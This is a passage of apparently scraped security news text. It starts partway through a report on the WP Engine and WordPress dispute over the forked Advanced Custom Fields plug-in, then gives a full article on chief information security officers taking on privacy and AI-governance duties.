In a blog post, Ian Poulson, product manager for ACF, pointed to over 15 releases and significant new functionality the ACF team has made to the free version of the plug-in over the past two years, in addition to improvements to the paid version. Mullenweg's decision to fork ACF is "inconsistent with open source values and principles," he noted.

"The change made by Mullenweg is maliciously being used to update millions of existing installations of ACF with code that is unapproved and untrusted by the Advanced Custom Fields team," Poulson wrote. Organizations using a free version of ACF must download version 6.3.8 from Advanced Custom Fields if they wish to continue receiving ACF-approved updates, he noted.

Earlier this month, WPE filed a lawsuit citing "abuse of power, extortion, and greed" against Automattic and Mullenweg. WPE has also sent a cease-and-desist letter to Automattic over the same issue.

**User Confusion?**

Stephen Kowski, field chief technology officer for SlashNext Email Security, says the dispute between WordPress and WP Engine over the Advanced Custom Fields plug-in reveals tensions in open source software management that could signal the start of a messier ongoing conflict.

"This conflict could result in user confusion and potential migration work, as automatic updates may lead to unknowing transitions to the new Secure Custom Fields plug-in," he notes. "Users may ultimately need to do further due diligence taking into account security and migration resources if needed, in order to choose between WP Engine's original ACF plug-in and WordPress' forked version, Secure Custom Fields."

Kowski perceives Mullenweg's decision as having a twofold impact. The newly forked Secure Custom Fields plug-in addresses a security issue that WP Engine has already patched and therefore is unlikely to be of any benefit for users. "On the other hand, the update process may introduce new risks if users are not aware of the changes or do not properly transition to the new plug-in," he says. "Users should exercise caution and carefully evaluate the plug-ins they use to ensure they are getting updates from trusted sources."

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

WP Engine Accuses WordPress of 'Forcibly' Taking Over Its Plug-in

A heated regulatory landscape, uncertainty over AI use, and how it all ties back to cybersecurity means CISOs have to add privacy to their portfolios.

Source: Leo Wolfert via Alamy Stock Photo

Years ago, when Mark Eggleston was tasked with building a privacy program for a national healthcare provider, he saw firsthand the importance of cross-functional collaboration.

"I needed legal experts to debate the HIPAA Privacy, NPRM \[Notice of Proposed Rulemaking\], final rule, and guidance and convert those requirements into internal policies," Eggleston recalls. "CISOs can bring efficiency and reliance to these procedures by implementing technical controls."

Eggleston, who is currently the chief information security officer (CISO) at CSC, a provider of business administration and compliance solutions, now recognizes how this collaboration underscores a larger trend occurring: CISOs are increasingly taking responsibility for privacy within organizations. According to research from IANS, CISO ownership of privacy has surged from 35% to 47% over the past five years. This growing role comes as privacy management and cybersecurity become more intertwined, fueled by regulatory pressures; evolving questions and concerns about certain technologies, like artificial intelligence (AI); and the always present desire to avoid becoming a victim of a data breach.

Traditionally, privacy and security were considered separate domains within an organization. Privacy was the responsibility of legal or compliance teams, while CISOs focused on protecting the organization from cyber threats. However, the line between these two areas is blurring, and more CISOs are being asked to handle privacy functions.

"When a CISO conducts a risk assessment or looks at data flow, they're already thinking about how to protect that information," says Rebecca Herold, CEO of The Privacy Professor and an IANS faculty member. Adding privacy to the role simply formalizes what they're already doing in many cases, she says.

Yunique Demann, senior director and data protection officer at NTT Data Americas, began her career in a security role and then moved into a privacy position, giving her a view into both disciplines.

"With the rise in data breaches, regulations, and regulatory scrutiny outside your legal, risk, or compliance functions, CISOs are becoming a natural fit to oversee privacy controls," she says. "Privacy is one of many areas that have impacted a CISO's role."

**Why CISOs Are Taking on Privacy Roles**

Another driver behind the shift in responsibility is the ever-changing regulatory landscape. Privacy laws, like the General Data Protection Regulation (GDPR) in Europe and the California Consumer Privacy Act (CCPA) in the US, are placing greater demands on organizations to protect personal data. These regulations require organizations to have robust privacy controls, and, in many cases, the CISO is seen as integral to helping to oversee those efforts. CSC's Eggleston, who has held both CISO and chief privacy officer (CPO) roles, says the shift has been afoot for years, as CISOs have had to work with other departments where privacy is also essential.

"Most CISOs are already working strongly with human resources and legal teams, and the focus on privacy makes it paramount to continue to do so, as both HR and legal have core interest in privacy matters," he says. "Even the NIST Cybersecurity Framework is now integrating privacy into its guidelines."

With CISOs taking on more privacy duties comes a growing need to balance these responsibilities with their traditional focus on cybersecurity. There is also the potential for a conflict of interest, Demann says.

"But this is handled when operational privacy responsibilities are given to a DPO \[data protection officer\], while keeping the reporting line into security," she says.

In addition to regulatory pressures, advances in technology, such as the widespread adoption of AI, are contributing to CISOs' expanded role in privacy management. A recent survey from the International Association of Privacy Professionals (IAPP) found that 69% of chief privacy officers now have additional responsibility for AI governance, and 37% for cybersecurity regulatory compliance. And for good reason, says Demann, because many areas around AI require more scrutiny from both a privacy and security perspective.

"Privacy risks occur when the use of AI conflicts with these fundamentals and lacks transparency and incorporates bias in the process," she says. "Just because your LLM \[large language model\] can utilize huge amounts of data points, it doesn't mean it should, especially without consent of the individuals whose data you are using. Consent should be clear and explicit. Unfortunately, we are finding too many situations where consent is hidden."

**Reskilling to Handle Privacy**

The skills required for privacy management are also evolving, and CISOs must be prepared to adapt.

"Privacy is fundamentally about protecting individuals' rights and ensuring the processing of personal data is performed in accordance with applicable laws," Demann says. "This requires a deeper understanding of legal, ethical, and regulatory frameworks and a focus on data governance, consent management, and transparency."

She encourages CISOs to engage with privacy communities, collaborate with privacy leads, and actively seek opportunities to expand their knowledge of privacy issues.

For CISOs, collaboration with CPOs and legal departments is also key to ensuring both security and privacy compliance within their organizations. Demann recommends regular communication and joint initiatives, such as combined tabletop exercises and industry presentations, to create a unified approach to privacy and security.

"The more privacy and security leads can show up together, the easier it is for the organization to have a strategic approach," she says.

Eggleston stresses the importance of staying informed through think tank digests, privacy updates from legal firms, and ongoing discussions with jurisdictional staff.

"Many EMEA countries have much more detailed and stronger requirements for privacy," he notes, citing Luxembourg's Professional Secrecy obligation as an example.

Looking ahead, CISOs need to be prepared to navigate emerging privacy trends, whether or not privacy is in their purview. As the role expands, they will need to continue building their knowledge of privacy laws and collaborating across departments to protect both company data and individuals' rights.

"Security is about confidentiality, and privacy is fundamentally about confidentiality," Eggleston concludes. "Privacy and security are stronger together."

**About the Author**

Contributing Writer, Dark Reading

Joan Goodchild is a veteran journalist, editor, and writer who has been covering security for more than a decade. She has written for several publications and previously served as editor-in-chief for CSO Online.

Tag

#auth